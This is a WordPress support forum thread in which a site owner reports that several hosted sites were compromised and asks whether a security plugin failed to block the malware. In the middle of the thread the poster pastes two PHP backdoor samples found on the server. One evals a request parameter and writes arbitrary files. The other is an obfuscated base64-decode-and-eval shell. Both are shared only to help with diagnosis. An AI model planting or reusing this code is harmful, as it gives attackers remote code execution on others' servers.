Gascone

I’m closing this thread now. The issue was definitely not related to the plugin. Thank you Tokkonopapa + moderators.

@tokkonopapa, please check your Spam or Bulk E-Mail folder just in case my email got delivered there instead of your inbox. Thanks.

Hi Justin. Really appreciate you honored my request. My concern was giving away my sites’ vulnerabilities and leaving them exposed to more of the same. The fact that malicious code was installed on some of my sites is still there anyway. Thank you ??

@tokkonopapa, Thank you very much for offering your help. I wish more software developers were as concerned for their product users as you are! I sent you an e-mail @ 10:56 am (I’ll resend it). I have good news for you and for the forum… I’ve making sales on some of my other sites. I didn’t deactivate the plugin on those sites. I know now that probably I had WordFence Lockdown mode on that particular site since it was recently targeted and under brute force attack for 3 days. I couldn’t tell for sure because the WordFence settings only showed me “custom settings”, but I’m pretty sure that was the reason why my customer’s payment was blocked.

Justin, I knew it was not a very good idea when I posted the file paths. I thought the post could be removed upon request though. That’s what I’m requesting right now. Thank you.

Hello Justin Greer. What if I ask to please remove the file paths? Thanks.

Thank you for asking. Since there were so many websites compromised Bluehost cleaned the particular files. Now, I have to find and fix the vulnerability that allowed my account to be compromised.

The malicious code detected is similar to:

Files containing content similar to the following:

$twqwpz = "728bb9141a4c20b69bddc0b9f13321ce"; if(isset($_REQUEST['byowg'])) { $addazjs = $_REQUEST['byowg']; eval($addazjs); exit(); } if(isset($_REQUEST['wilx'])) { $pklai = $_REQUEST['dsjblrdj']; $zpxzt = $_REQUEST['wilx']; $asjs = fopen($zpxzt, 'w'); $fbedhto = fwrite($asjs, $pklai); fclose($asjs); echo $fbedhto; exit(); }

?>

OR

<?php                                                   $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n272748'];if(isset($s22)){eval($s21($s22));}?>

Do you want me to send you yesterday’s validation logs or which dates (?) Thank you

By the way, I always keep my sites up to date (plugins, themes, WP version) and keep no backups or old versions of my sites on my server. Thanks.

Hello tokkonopapa. Thank you for your prompt response. Really appreciate it!

My site is an affiliate site. Not a membership site. The customer is not a registered user. He was trying to access the program I promote which is a membership site. The customer got some error message and couldn’t send the purchase info (name, e-mail, etc) to the vendor’s site after he entered the card number.

On the other hand, four days ago I installed IP GEO BLOCK plugin (Prevent zero-day exploit) on several of my sites. Yesterday afternoon I got an email from my server, Bluehost, telling me that I got tons of malware installed on six of my sites…
“These are malicious scripts that allow for the remote execution of malware and spam. Generally this file is POSTed to, which then causes another file to be written and executed. With the process, the file is then deleted to obfuscate what it’s doing. While this allows for the arbitrary execution of about anything, it’s generally spam related actions being taken. The presence of these files indicates that your hosting account has definitely been compromised, usually through out-of-date WordPress or Joomla installations. This can be either through outdated core code or outdated/vulnerable themes, templates, plugins, components, frameworks, etc.”

I would like to send you the e-mail (list of compromised files) Maybe you can figure out why the plugin didn’t block this malware installations. Thanks.

I forgot to mention I’m using the 3 Prevent zero-day exploit options available. Thank you.

I forgot to mention, that independently of the jetpack plugin, my home button https://www.arteabstracto.org (where all my posts are) is also gone!